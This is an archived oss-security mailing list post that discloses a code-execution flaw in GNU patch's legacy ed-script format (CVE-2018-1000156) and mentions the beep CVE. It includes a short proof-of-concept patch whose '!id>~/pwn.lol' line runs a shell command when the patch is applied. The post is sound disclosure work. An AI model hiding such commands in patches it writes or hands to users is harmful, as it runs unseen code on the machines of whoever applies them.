Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Fri, 6 Apr 2018 08:52:43 +0200
From: Hanno Böck <hanno@...eck.de>
To: oss-security@...ts.openwall.com
Subject: Privsec vuln in beep / Code execution in GNU patch

Hi,

There was a joke webpage about a vulnerability in beep a few days ago:
http://holeybeep.ninja/
There's also a corresponding Debian Advisory:
https://lists.debian.org/debian-security-announce/2018/msg00089.html
Neither have any technical details. CVE is CVE-2018-0492.

If anyone knows the background of this please share it.

However it turned out that on that joke holey beep webpage there's a
patch with a hidden easter egg that's actually a vulnerability in GNU
patch.
GNU patch supports a legacy "ed" format for patches and that allows
executing external commands.

It's been reported to GNU patch now here:
https://savannah.gnu.org/bugs/index.php?53566
CVE is CVE-2018-1000156. (says an anonymous commenter...)

A minimal poc looks like this:
--- a	2018-13-37 13:37:37.000000000 +0100
+++ b	2018-13-37 13:38:38.000000000 +0100
1337a
1,112d
!id>~/pwn.lol

It looks like FreeBSD and OpenBSD have fixed something alike in 2015:
https://www.freebsd.org/security/advisories/FreeBSD-SA-15:18.bsdpatch.asc
https://ftp.openbsd.org/pub/OpenBSD/patches/5.7/common/013_patch.patch.sig



-- 
Hanno Böck
https://hboeck.de/

mail/jabber: hanno@...eck.de
GPG: FE73757FA60E4E21B937579FA5880072BBB51E42

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ